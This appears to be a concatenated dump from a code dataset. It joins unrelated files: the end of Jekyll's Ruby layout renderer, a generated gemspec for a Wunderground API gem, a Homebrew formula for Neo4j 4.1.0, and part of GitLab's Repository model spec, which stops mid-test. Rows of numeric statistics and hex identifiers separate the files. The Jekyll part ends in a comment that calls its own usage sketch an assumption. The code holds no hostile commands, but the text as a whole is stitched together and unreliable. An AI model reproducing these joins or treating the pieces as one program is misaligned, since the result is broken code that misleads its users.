# Returns Boolean true if the layout is invalid, false if otherwise
def invalid_layout?(layout)
!document.data["layout"].nil? && layout.nil? && !(document.is_a? Jekyll::Excerpt)
end
# Render layouts and place document content inside.
#
# Returns String rendered content
def place_in_layouts(content, payload, info)
output = content.dup
layout = layouts[document.data["layout"].to_s]
validate_layout(layout)
used = Set.new([layout])
# Reset the payload layout data to ensure it starts fresh for each page.
payload["layout"] = nil
while layout
output = render_layout(output, layout, info)
add_regenerator_dependencies(layout)
if (layout = site.layouts[layout.data["layout"]])
break if used.include?(layout)
used << layout
end
end
output
end
# Checks if the layout specified in the document actually exists
#
# layout - the layout to check
# Returns nothing
private
def validate_layout(layout)
return unless invalid_layout?(layout)
Jekyll.logger.warn(
"Build Warning:",
"Layout '#{document.data["layout"]}' requested "\
"in #{document.relative_path} does not exist."
)
end
# Render layout content into document.output
#
# Returns String rendered content
private
def render_layout(output, layout, info)
payload["content"] = output
payload["layout"] = Utils.deep_merge_hashes(layout.data, payload["layout"] || {})
render_liquid(
layout.content,
payload,
info,
layout.relative_path
)
end
private
def add_regenerator_dependencies(layout)
return unless document.write?
site.regenerator.add_dependency(
site.in_source_dir(document.path),
layout.path
)
end
# Set page content to payload and assign pager if document has one.
#
# Returns nothing
private
def assign_pages!
payload["page"] = document.to_liquid
payload["paginator"] = if document.respond_to?(:pager)
document.pager.to_liquid
end
end
# Set related posts to payload if document is a post.
#
# Returns nothing
private
def assign_current_document!
payload["site"].current_document = document
end
# Set highlighter prefix and suffix
#
# Returns nothing
private
def assign_highlighter_options!
payload["highlighter_prefix"] = converters.first.highlighter_prefix
payload["highlighter_suffix"] = converters.first.highlighter_suffix
end
private
def assign_layout_data!
layout = layouts[document.data["layout"]]
if layout
payload["layout"] = Utils.deep_merge_hashes(layout.data, payload["layout"] || {})
end
end
private
def permalink_ext
if document.permalink && !document.permalink.end_with?("/")
permalink_ext = File.extname(document.permalink)
permalink_ext unless permalink_ext.empty?
end
end
private
def converter_output_ext
if output_exts.size == 1
output_exts.last
else
output_exts[-2]
end
end
private
def output_exts
@output_exts ||= converters.map do |c|
c.output_ext(document.extname)
end.compact
end
end
end
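# Hedged usage sketch (how Jekyll itself drives this class is an assumption;
# the constructor and #run are defined above):
#
#   renderer = Jekyll::Renderer.new(site, document)
#   document.output = renderer.run # Liquid, then converters, then layouts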
| 28.327068 | 89 | 0.645919 |
e277aefc03cb4599af875840c918003328c2c67e | 2,597 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "wunderground"
s.version = "1.2.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Winfred Nadeau"]
s.date = "2014-02-11"
s.description = "A simple ruby API wrapper for interacting with the Wunderground API"
s.email = "[email protected]"
s.extra_rdoc_files = [
"LICENSE.txt",
"README.markdown"
]
s.files = [
"Gemfile",
"LICENSE.txt",
"README.markdown",
"Rakefile",
"VERSION",
"lib/wunderground.rb",
"test/helper.rb",
"test/test_wunderground.rb",
"wunderground.gemspec",
"wunderground_ruby.gemspec"
]
s.homepage = "http://github.com/wnadeau/wunderground_ruby"
s.licenses = ["MIT"]
s.require_paths = ["lib"]
s.rubygems_version = "1.8.23"
s.summary = "A simple ruby API wrapper for interacting with the Wunderground API"
if s.respond_to? :specification_version then
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<json>, ["> 1.4.0"])
s.add_runtime_dependency(%q<httparty>, ["> 0.6.0"])
s.add_runtime_dependency(%q<addressable>, [">= 0"])
s.add_development_dependency(%q<shoulda>, [">= 0"])
s.add_development_dependency(%q<bundler>, [">= 0"])
s.add_development_dependency(%q<jeweler>, [">= 0"])
s.add_development_dependency(%q<simplecov>, [">= 0"])
s.add_development_dependency(%q<mocha>, ["> 0.9.11"])
s.add_development_dependency(%q<pry>, [">= 0"])
else
s.add_dependency(%q<json>, ["> 1.4.0"])
s.add_dependency(%q<httparty>, ["> 0.6.0"])
s.add_dependency(%q<addressable>, [">= 0"])
s.add_dependency(%q<shoulda>, [">= 0"])
s.add_dependency(%q<bundler>, [">= 0"])
s.add_dependency(%q<jeweler>, [">= 0"])
s.add_dependency(%q<simplecov>, [">= 0"])
s.add_dependency(%q<mocha>, ["> 0.9.11"])
s.add_dependency(%q<pry>, [">= 0"])
end
else
s.add_dependency(%q<json>, ["> 1.4.0"])
s.add_dependency(%q<httparty>, ["> 0.6.0"])
s.add_dependency(%q<addressable>, [">= 0"])
s.add_dependency(%q<shoulda>, [">= 0"])
s.add_dependency(%q<bundler>, [">= 0"])
s.add_dependency(%q<jeweler>, [">= 0"])
s.add_dependency(%q<simplecov>, [">= 0"])
s.add_dependency(%q<mocha>, ["> 0.9.11"])
s.add_dependency(%q<pry>, [">= 0"])
end
end
| 35.094595 | 105 | 0.615325 |
213cff9381185122cf2cd5efec0533bfffa08287 | 2,775 | class Neo4j < Formula
desc "Robust (fully ACID) transactional property graph database"
homepage "https://neo4j.com/"
url "https://neo4j.com/artifact.php?name=neo4j-community-4.1.0-unix.tar.gz"
sha256 "b598edeb3401e5ec40fb7bc3370307addfcaa21565f731016c9c7f8e70af659a"
bottle :unneeded
# Upstream does not intend to provide Java 8+ support until 4.0
# and there are various issues with running against newer Javas.
# https://github.com/neo4j/neo4j/issues/11728#issuecomment-387038804
# https://github.com/neo4j/neo4j-browser/issues/671#issuecomment-346224754
# https://github.com/Homebrew/homebrew-core/issues/31090
# As of v4.1.0, neo4j still needs to build with java 1.8
# https://github.com/neo4j/neo4j/issues/12516
depends_on :java => "1.8"
def install
ENV["NEO4J_HOME"] = libexec
# Remove windows files
rm_f Dir["bin/*.bat"]
# Install jars in libexec to avoid conflicts
libexec.install Dir["*"]
# Symlink binaries
bin.install Dir["#{libexec}/bin/neo4j{,-shell,-import,-shared.sh,-admin}", "#{libexec}/bin/cypher-shell"]
bin.env_script_all_files(libexec/"bin", :NEO4J_HOME => ENV["NEO4J_HOME"])
# Adjust UDC props
# Suppress the empty, focus-stealing java gui.
(libexec/"conf/neo4j.conf").append_lines <<~EOS
wrapper.java.additional=-Djava.awt.headless=true
wrapper.java.additional.4=-Dneo4j.ext.udc.source=homebrew
dbms.directories.data=#{var}/neo4j/data
dbms.directories.logs=#{var}/log/neo4j
EOS
end
def post_install
(var/"log/neo4j").mkpath
(var/"neo4j").mkpath
end
plist_options :manual => "neo4j start"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<false/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/neo4j</string>
<string>console</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/neo4j.log</string>
<key>StandardOutPath</key>
<string>#{var}/log/neo4j.log</string>
</dict>
</plist>
EOS
end
test do
ENV["NEO4J_HOME"] = libexec
ENV["NEO4J_LOG"] = testpath/"libexec/data/log/neo4j.log"
ENV["NEO4J_PIDFILE"] = testpath/"libexec/data/neo4j-service.pid"
mkpath testpath/"libexec/data/log"
assert_match /Neo4j .*is not running/i, shell_output("#{bin}/neo4j status", 3)
end
end
| 33.433735 | 109 | 0.645405 |
ac69c1a667d93934bef958624b81191df6c638bd | 90,541 | # frozen_string_literal: true
require 'spec_helper'
describe Repository do
include RepoHelpers
include GitHelpers
TestBlob = Struct.new(:path)
let(:project) { create(:project, :repository) }
let(:repository) { project.repository }
let(:broken_repository) { create(:project, :broken_storage).repository }
let(:user) { create(:user) }
let(:git_user) { Gitlab::Git::User.from_gitlab(user) }
let(:message) { 'Test message' }
let(:merge_commit) do
merge_request = create(:merge_request, source_branch: 'feature', target_branch: 'master', source_project: project)
merge_commit_id = repository.merge(user,
merge_request.diff_head_sha,
merge_request,
message)
repository.commit(merge_commit_id)
end
let(:author_email) { '[email protected]' }
let(:author_name) { 'John Doe' }
def expect_to_raise_storage_error
expect { yield }.to raise_error do |exception|
storage_exceptions = [Gitlab::Git::CommandError, GRPC::Unavailable]
known_exception = storage_exceptions.find { |e| exception.is_a?(e) }
expect(known_exception).not_to be_nil
end
end
describe '#branch_names_contains' do
let_it_be(:project) { create(:project, :repository) }
let(:repository) { project.repository }
subject { repository.branch_names_contains(sample_commit.id) }
it { is_expected.to include('master') }
it { is_expected.not_to include('feature') }
it { is_expected.not_to include('fix') }
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.branch_names_contains(sample_commit.id)
end
end
end
end
describe '#tag_names_contains' do
subject { repository.tag_names_contains(sample_commit.id) }
it { is_expected.to include('v1.1.0') }
it { is_expected.not_to include('v1.0.0') }
end
describe 'tags_sorted_by' do
let(:tags_to_compare) { %w[v1.0.0 v1.1.0] }
context 'name_desc' do
subject { repository.tags_sorted_by('name_desc').map(&:name) & tags_to_compare }
it { is_expected.to eq(['v1.1.0', 'v1.0.0']) }
end
context 'name_asc' do
subject { repository.tags_sorted_by('name_asc').map(&:name) & tags_to_compare }
it { is_expected.to eq(['v1.0.0', 'v1.1.0']) }
end
context 'updated' do
let(:tag_a) { repository.find_tag('v1.0.0') }
let(:tag_b) { repository.find_tag('v1.1.0') }
context 'desc' do
subject { repository.tags_sorted_by('updated_desc').map(&:name) }
before do
double_first = double(committed_date: Time.now)
double_last = double(committed_date: Time.now - 1.second)
allow(tag_a).to receive(:dereferenced_target).and_return(double_first)
allow(tag_b).to receive(:dereferenced_target).and_return(double_last)
allow(repository).to receive(:tags).and_return([tag_a, tag_b])
end
it { is_expected.to eq(['v1.0.0', 'v1.1.0']) }
end
context 'asc' do
subject { repository.tags_sorted_by('updated_asc').map(&:name) }
before do
double_first = double(committed_date: Time.now - 1.second)
double_last = double(committed_date: Time.now)
allow(tag_a).to receive(:dereferenced_target).and_return(double_last)
allow(tag_b).to receive(:dereferenced_target).and_return(double_first)
allow(repository).to receive(:tags).and_return([tag_a, tag_b])
end
it { is_expected.to eq(['v1.1.0', 'v1.0.0']) }
end
context 'annotated tag pointing to a blob' do
let(:annotated_tag_name) { 'annotated-tag' }
subject { repository.tags_sorted_by('updated_asc').map(&:name) & (tags_to_compare + [annotated_tag_name]) }
before do
options = { message: 'test tag message\n',
tagger: { name: 'John Smith', email: '[email protected]' } }
rugged_repo(repository).tags.create(annotated_tag_name, 'a48e4fc218069f68ef2e769dd8dfea3991362175', options)
double_first = double(committed_date: Time.now - 1.second)
double_last = double(committed_date: Time.now)
allow(tag_a).to receive(:dereferenced_target).and_return(double_last)
allow(tag_b).to receive(:dereferenced_target).and_return(double_first)
end
it { is_expected.to eq(['v1.1.0', 'v1.0.0', annotated_tag_name]) }
after do
rugged_repo(repository).tags.delete(annotated_tag_name)
end
end
end
end
describe '#ref_name_for_sha' do
it 'returns the ref' do
allow(repository.raw_repository).to receive(:ref_name_for_sha)
.and_return('refs/environments/production/77')
expect(repository.ref_name_for_sha('bla', '0' * 40)).to eq 'refs/environments/production/77'
end
end
describe '#ref_exists?' do
context 'when ref exists' do
it 'returns true' do
expect(repository.ref_exists?('refs/heads/master')).to be true
end
end
context 'when ref does not exist' do
it 'returns false' do
expect(repository.ref_exists?('refs/heads/non-existent')).to be false
end
end
context 'when ref format is incorrect' do
it 'returns false' do
expect(repository.ref_exists?('refs/heads/invalid:master')).to be false
end
end
end
describe '#list_last_commits_for_tree' do
let(:path_to_commit) do
{
"encoding" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"files" => "570e7b2abdd848b95f2f578043fc23bd6f6fd24d",
".gitignore" => "c1acaa58bbcbc3eafe538cb8274ba387047b69f8",
".gitmodules" => "6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9",
"CHANGELOG" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"CONTRIBUTING.md" => "6d394385cf567f80a8fd85055db1ab4c5295806f",
"Gemfile.zip" => "ae73cb07c9eeaf35924a10f713b364d32b2dd34f",
"LICENSE" => "1a0b36b3cdad1d2ee32457c102a8c0b7056fa863",
"MAINTENANCE.md" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"PROCESS.md" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"README.md" => "1a0b36b3cdad1d2ee32457c102a8c0b7056fa863",
"VERSION" => "913c66a37b4a45b9769037c55c2d238bd0942d2e",
"gitlab-shell" => "6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9",
"six" => "cfe32cf61b73a0d5e9f13e774abde7ff789b1660"
}
end
subject { repository.list_last_commits_for_tree(sample_commit.id, '.').id }
it 'returns the last commits for every entry in the current path' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.')
result.each do |key, value|
result[key] = value.id
end
expect(result).to include(path_to_commit)
end
it 'returns the last commits for every entry in the current path starting from the offset' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.', offset: path_to_commit.size - 1)
expect(result.size).to eq(1)
end
it 'returns a limited number of last commits for every entry in the current path starting from the offset' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.', limit: 1)
expect(result.size).to eq(1)
end
it 'returns an empty hash when offset is out of bounds' do
result = repository.list_last_commits_for_tree(sample_commit.id, '.', offset: path_to_commit.size)
expect(result.size).to eq(0)
end
context 'with a commit with invalid UTF-8 path' do
def create_commit_with_invalid_utf8_path
rugged = rugged_repo(repository)
blob_id = Rugged::Blob.from_buffer(rugged, "some contents")
tree_builder = Rugged::Tree::Builder.new(rugged)
tree_builder.insert({ oid: blob_id, name: "hello\x80world", filemode: 0100644 })
tree_id = tree_builder.write
user = { email: "[email protected]", time: Time.now, name: "John Cai" }
Rugged::Commit.create(rugged, message: 'some commit message', parents: [rugged.head.target.oid], tree: tree_id, committer: user, author: user)
end
it 'does not raise an error' do
commit = create_commit_with_invalid_utf8_path
expect { repository.list_last_commits_for_tree(commit, '.', offset: 0) }.not_to raise_error
end
end
end
describe '#last_commit_for_path' do
subject { repository.last_commit_for_path(sample_commit.id, '.gitignore').id }
it { is_expected.to eq('c1acaa58bbcbc3eafe538cb8274ba387047b69f8') }
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.last_commit_id_for_path(sample_commit.id, '.gitignore')
end
end
end
end
describe '#last_commit_id_for_path' do
subject { repository.last_commit_id_for_path(sample_commit.id, '.gitignore') }
it "returns last commit id for a given path" do
is_expected.to eq('c1acaa58bbcbc3eafe538cb8274ba387047b69f8')
end
it "caches last commit id for a given path" do
cache = repository.send(:cache)
key = "last_commit_id_for_path:#{sample_commit.id}:#{Digest::SHA1.hexdigest('.gitignore')}"
expect(cache).to receive(:fetch).with(key).and_return('c1acaa5')
is_expected.to eq('c1acaa5')
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.last_commit_for_path(sample_commit.id, '.gitignore').id
end
end
end
end
describe '#commits' do
context 'when neither the all flag nor a ref are specified' do
it 'returns every commit from default branch' do
expect(repository.commits(nil, limit: 60).size).to eq(37)
end
end
context 'when ref is passed' do
it 'returns every commit from the specified ref' do
expect(repository.commits('master', limit: 60).size).to eq(37)
end
context 'when all' do
it 'returns every commit from the repository' do
expect(repository.commits('master', limit: 60, all: true).size).to eq(60)
end
end
context 'with path' do
it 'sets follow when it is a single path' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(follow: true)).and_call_original.twice
repository.commits('master', limit: 1, path: 'README.md')
repository.commits('master', limit: 1, path: ['README.md'])
end
it 'does not set follow when it is multiple paths' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(follow: false)).and_call_original
repository.commits('master', limit: 1, path: ['README.md', 'CHANGELOG'])
end
end
context 'without path' do
it 'does not set follow' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(follow: false)).and_call_original
repository.commits('master', limit: 1)
end
end
end
context "when 'author' is set" do
it "returns commits from that author" do
commit = repository.commits(nil, limit: 1).first
known_author = "#{commit.author_name} <#{commit.author_email}>"
expect(repository.commits(nil, author: known_author, limit: 1)).not_to be_empty
end
it "doesn't returns commits from an unknown author" do
unknown_author = "The Man With No Name <[email protected]>"
expect(repository.commits(nil, author: unknown_author, limit: 1)).to be_empty
end
end
context "when 'all' flag is set" do
it 'returns every commit from the repository' do
expect(repository.commits(nil, all: true, limit: 60).size).to eq(60)
end
end
context "when 'order' flag is set" do
it 'passes order option to perform the query' do
expect(Gitlab::Git::Commit).to receive(:where).with(a_hash_including(order: 'topo')).and_call_original
repository.commits('master', limit: 1, order: 'topo')
end
end
end
describe '#new_commits' do
let_it_be(:project) { create(:project, :repository) }
let(:repository) { project.repository }
subject { repository.new_commits(rev) }
context 'when there are no new commits' do
let(:rev) { repository.commit.id }
it 'returns an empty array' do
expect(subject).to eq([])
end
end
context 'when new commits are found' do
let(:branch) { 'orphaned-branch' }
let!(:rev) { repository.commit(branch).id }
it 'returns the commits' do
repository.delete_branch(branch)
expect(subject).not_to be_empty
expect(subject).to all( be_a(::Commit) )
expect(subject.size).to eq(1)
end
end
end
describe '#commits_by' do
let_it_be(:project) { create(:project, :repository) }
let(:oids) { TestEnv::BRANCH_SHA.values }
subject { project.repository.commits_by(oids: oids) }
it 'finds each commit' do
expect(subject).not_to include(nil)
expect(subject.size).to eq(oids.size)
end
it 'returns only Commit instances' do
expect(subject).to all( be_a(Commit) )
end
context 'when some commits are not found ' do
let(:oids) do
['deadbeef'] + TestEnv::BRANCH_SHA.each_value.first(10)
end
it 'returns only found commits' do
expect(subject).not_to include(nil)
expect(subject.size).to eq(10)
end
end
context 'when no oids are passed' do
let(:oids) { [] }
it 'does not call #batch_by_oid' do
expect(Gitlab::Git::Commit).not_to receive(:batch_by_oid)
subject
end
end
end
describe '#find_commits_by_message' do
it 'returns commits with messages containing a given string' do
commit_ids = repository.find_commits_by_message('submodule').map(&:id)
expect(commit_ids).to include(
'5937ac0a7beb003549fc5fd26fc247adbce4a52e',
'6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9',
'cfe32cf61b73a0d5e9f13e774abde7ff789b1660'
)
expect(commit_ids).not_to include('913c66a37b4a45b9769037c55c2d238bd0942d2e')
end
it 'is case insensitive' do
commit_ids = repository.find_commits_by_message('SUBMODULE').map(&:id)
expect(commit_ids).to include('5937ac0a7beb003549fc5fd26fc247adbce4a52e')
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error { broken_repository.find_commits_by_message('s') }
end
end
end
describe '#blob_at' do
context 'blank sha' do
subject { repository.blob_at(Gitlab::Git::BLANK_SHA, '.gitignore') }
it { is_expected.to be_nil }
end
context 'regular blob' do
subject { repository.blob_at(repository.head_commit.sha, '.gitignore') }
it { is_expected.to be_an_instance_of(::Blob) }
end
context 'readme blob on HEAD' do
subject { repository.blob_at(repository.head_commit.sha, 'README.md') }
it { is_expected.to be_an_instance_of(::ReadmeBlob) }
end
context 'readme blob not on HEAD' do
subject { repository.blob_at(repository.find_branch('feature').target, 'README.md') }
it { is_expected.to be_an_instance_of(::Blob) }
end
end
describe '#merged_to_root_ref?' do
context 'merged branch without ff' do
subject { repository.merged_to_root_ref?('branch-merged') }
it { is_expected.to be_truthy }
end
# If the HEAD was ff then it will be false
context 'merged with ff' do
subject { repository.merged_to_root_ref?('improve/awesome') }
it { is_expected.to be_truthy }
end
context 'not merged branch' do
subject { repository.merged_to_root_ref?('not-merged-branch') }
it { is_expected.to be_falsey }
end
context 'default branch' do
subject { repository.merged_to_root_ref?('master') }
it { is_expected.to be_falsey }
end
context 'non merged branch' do
subject { repository.merged_to_root_ref?('fix') }
it { is_expected.to be_falsey }
end
context 'non existent branch' do
subject { repository.merged_to_root_ref?('non_existent_branch') }
it { is_expected.to be_nil }
end
end
describe "#root_ref_sha" do
let(:commit) { double("commit", sha: "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3") }
subject { repository.root_ref_sha }
before do
allow(repository).to receive(:commit).with(repository.root_ref) { commit }
end
it { is_expected.to eq(commit.sha) }
end
describe "#merged_branch_names", :clean_gitlab_redis_cache do
subject { repository.merged_branch_names(branch_names) }
let(:branch_names) { %w(test beep boop definitely_merged) }
let(:already_merged) { Set.new(["definitely_merged"]) }
let(:write_hash) do
{
"test" => Gitlab::Redis::Boolean.new(false).to_s,
"beep" => Gitlab::Redis::Boolean.new(false).to_s,
"boop" => Gitlab::Redis::Boolean.new(false).to_s,
"definitely_merged" => Gitlab::Redis::Boolean.new(true).to_s
}
end
let(:read_hash) do
{
"test" => Gitlab::Redis::Boolean.new(false).to_s,
"beep" => Gitlab::Redis::Boolean.new(false).to_s,
"boop" => Gitlab::Redis::Boolean.new(false).to_s,
"definitely_merged" => Gitlab::Redis::Boolean.new(true).to_s
}
end
let(:cache) { repository.send(:redis_hash_cache) }
let(:cache_key) { cache.cache_key(:merged_branch_names) }
before do
allow(repository.raw_repository).to receive(:merged_branch_names).with(branch_names).and_return(already_merged)
end
it { is_expected.to eq(already_merged) }
it { is_expected.to be_a(Set) }
describe "cache expiry" do
before do
allow(cache).to receive(:delete).with(anything)
end
it "is expired when the branches caches are expired" do
expect(cache).to receive(:delete).with(:merged_branch_names).at_least(:once)
repository.send(:expire_branches_cache)
end
it "is expired when the repository caches are expired" do
expect(cache).to receive(:delete).with(:merged_branch_names).at_least(:once)
repository.send(:expire_all_method_caches)
end
end
context "cache is empty" do
before do
cache.delete(:merged_branch_names)
end
it { is_expected.to eq(already_merged) }
describe "cache values" do
it "writes the values to redis" do
expect(cache).to receive(:write).with(:merged_branch_names, write_hash)
subject
end
it "matches the supplied hash" do
subject
expect(cache.read_members(:merged_branch_names, branch_names)).to eq(read_hash)
end
end
end
context "cache is not empty" do
before do
cache.write(:merged_branch_names, write_hash)
end
it { is_expected.to eq(already_merged) }
it "doesn't fetch from the disk" do
expect(repository.raw_repository).not_to receive(:merged_branch_names)
subject
end
end
context "cache is partially complete" do
before do
allow(repository.raw_repository).to receive(:merged_branch_names).with(["boop"]).and_return([])
hash = write_hash.except("boop")
cache.write(:merged_branch_names, hash)
end
it { is_expected.to eq(already_merged) }
it "does fetch from the disk" do
expect(repository.raw_repository).to receive(:merged_branch_names).with(["boop"])
subject
end
end
context "requested branches array is empty" do
let(:branch_names) { [] }
it { is_expected.to eq(already_merged) }
end
end
describe '#can_be_merged?' do
context 'mergeable branches' do
subject { repository.can_be_merged?('0b4bc9a49b562e85de7cc9e834518ea6828729b9', 'master') }
it { is_expected.to be_truthy }
end
context 'non-mergeable branches without conflict sides missing' do
subject { repository.can_be_merged?('bb5206fee213d983da88c47f9cf4cc6caf9c66dc', 'feature') }
it { is_expected.to be_falsey }
end
context 'non-mergeable branches with conflict sides missing' do
subject { repository.can_be_merged?('conflict-missing-side', 'conflict-start') }
it { is_expected.to be_falsey }
end
context 'submodule changes that confuse rugged' do
subject { repository.can_be_merged?('update-gitlab-shell-v-6-0-1', 'update-gitlab-shell-v-6-0-3') }
it { is_expected.to be_falsey }
end
end
describe '#commit' do
context 'when ref exists' do
it 'returns commit object' do
expect(repository.commit('master'))
.to be_an_instance_of Commit
end
end
context 'when ref does not exist' do
it 'returns nil' do
expect(repository.commit('non-existent-ref')).to be_nil
end
end
context 'when ref is not specified' do
it 'is using a root ref' do
expect(repository).to receive(:find_commit).with('master')
repository.commit
end
end
context 'when ref is not valid' do
context 'when preceding tree element exists' do
it 'returns nil' do
expect(repository.commit('master:ref')).to be_nil
end
end
context 'when preceding tree element does not exist' do
it 'returns nil' do
expect(repository.commit('non-existent:ref')).to be_nil
end
end
end
end
describe "#create_dir" do
it "commits a change that creates a new directory" do
expect do
repository.create_dir(user, 'newdir',
message: 'Create newdir', branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
newdir = repository.tree('master', 'newdir')
expect(newdir.path).to eq('newdir')
end
context "when committing to another project" do
let(:forked_project) { create(:project, :repository) }
it "creates a fork and commit to the forked project" do
expect do
repository.create_dir(user, 'newdir',
message: 'Create newdir', branch_name: 'patch',
start_branch_name: 'master', start_project: forked_project)
end.to change { repository.count_commits(ref: 'master') }.by(0)
expect(repository.branch_exists?('patch')).to be_truthy
expect(forked_project.repository.branch_exists?('patch')).to be_falsy
newdir = repository.tree('patch', 'newdir')
expect(newdir.path).to eq('newdir')
end
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.create_dir(user, 'newdir',
message: 'Add newdir',
branch_name: 'master',
author_email: author_email, author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "#create_file" do
it 'commits new file successfully' do
expect do
repository.create_file(user, 'NEWCHANGELOG', 'Changelog!',
message: 'Create changelog',
branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
blob = repository.blob_at('master', 'NEWCHANGELOG')
expect(blob.data).to eq('Changelog!')
end
it 'creates new file and dir when file_path has a forward slash' do
expect do
repository.create_file(user, 'new_dir/new_file.txt', 'File!',
message: 'Create new_file with new_dir',
branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
expect(repository.tree('master', 'new_dir').path).to eq('new_dir')
expect(repository.blob_at('master', 'new_dir/new_file.txt').data).to eq('File!')
end
it 'respects the autocrlf setting' do
repository.create_file(user, 'hello.txt', "Hello,\r\nWorld",
message: 'Add hello world',
branch_name: 'master')
blob = repository.blob_at('master', 'hello.txt')
expect(blob.data).to eq("Hello,\nWorld")
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.create_file(user, 'NEWREADME', 'README!',
message: 'Add README',
branch_name: 'master',
author_email: author_email,
author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "#update_file" do
it 'updates file successfully' do
expect do
repository.update_file(user, 'CHANGELOG', 'Changelog!',
message: 'Update changelog',
branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
blob = repository.blob_at('master', 'CHANGELOG')
expect(blob.data).to eq('Changelog!')
end
it 'updates filename successfully' do
expect do
repository.update_file(user, 'NEWLICENSE', 'Copyright!',
branch_name: 'master',
previous_path: 'LICENSE',
message: 'Changes filename')
end.to change { repository.count_commits(ref: 'master') }.by(1)
files = repository.ls_files('master')
expect(files).not_to include('LICENSE')
expect(files).to include('NEWLICENSE')
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.update_file(user, 'README', 'Updated README!',
branch_name: 'master',
previous_path: 'README',
message: 'Update README',
author_email: author_email,
author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "#delete_file" do
it 'removes file successfully' do
expect do
repository.delete_file(user, 'README',
message: 'Remove README', branch_name: 'master')
end.to change { repository.count_commits(ref: 'master') }.by(1)
expect(repository.blob_at('master', 'README')).to be_nil
end
context "when an author is specified" do
it "uses the given email/name to set the commit's author" do
expect do
repository.delete_file(user, 'README',
message: 'Remove README', branch_name: 'master',
author_email: author_email, author_name: author_name)
end.to change { repository.count_commits(ref: 'master') }.by(1)
last_commit = repository.commit
expect(last_commit.author_email).to eq(author_email)
expect(last_commit.author_name).to eq(author_name)
end
end
end
describe "search_files_by_content" do
let(:results) { repository.search_files_by_content('feature', 'master') }
subject { results }
it { is_expected.to be_an Array }
it 'regex-escapes the query string' do
results = repository.search_files_by_content("test\\", 'master')
expect(results.first).not_to start_with('fatal:')
end
it 'properly handles an unmatched parenthesis' do
results = repository.search_files_by_content("test(", 'master')
expect(results.first).not_to start_with('fatal:')
end
it 'properly handles when query is not present' do
results = repository.search_files_by_content('', 'master')
expect(results).to match_array([])
end
it 'properly handles query when repo is empty' do
repository = create(:project, :empty_repo).repository
results = repository.search_files_by_content('test', 'master')
expect(results).to match_array([])
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error do
broken_repository.search_files_by_content('feature', 'master')
end
end
end
describe 'result' do
subject { results.first }
it { is_expected.to be_a String }
it { expect(subject.lines[2]).to eq("master:CHANGELOG\x00190\x00 - Feature: Replace teams with group membership\n") }
end
end
describe "search_files_by_name" do
let(:results) { repository.search_files_by_name('files', 'master') }
it 'returns result' do
expect(results.first).to eq('files/html/500.html')
end
it 'ignores leading slashes' do
results = repository.search_files_by_name('/files', 'master')
expect(results.first).to eq('files/html/500.html')
end
it 'properly handles when query is only slashes' do
results = repository.search_files_by_name('//', 'master')
expect(results).to match_array([])
end
it 'properly handles when query is not present' do
results = repository.search_files_by_name('', 'master')
expect(results).to match_array([])
end
it 'properly handles query when repo is empty' do
repository = create(:project, :empty_repo).repository
results = repository.search_files_by_name('test', 'master')
expect(results).to match_array([])
end
describe 'when storage is broken', :broken_storage do
it 'raises a storage error' do
expect_to_raise_storage_error { broken_repository.search_files_by_name('files', 'master') }
end
end
end
describe '#async_remove_remote' do
before do
masterrev = repository.find_branch('master').dereferenced_target
create_remote_branch('joe', 'remote_branch', masterrev)
end
context 'when worker is scheduled successfully' do
before do
masterrev = repository.find_branch('master').dereferenced_target
create_remote_branch('remote_name', 'remote_branch', masterrev)
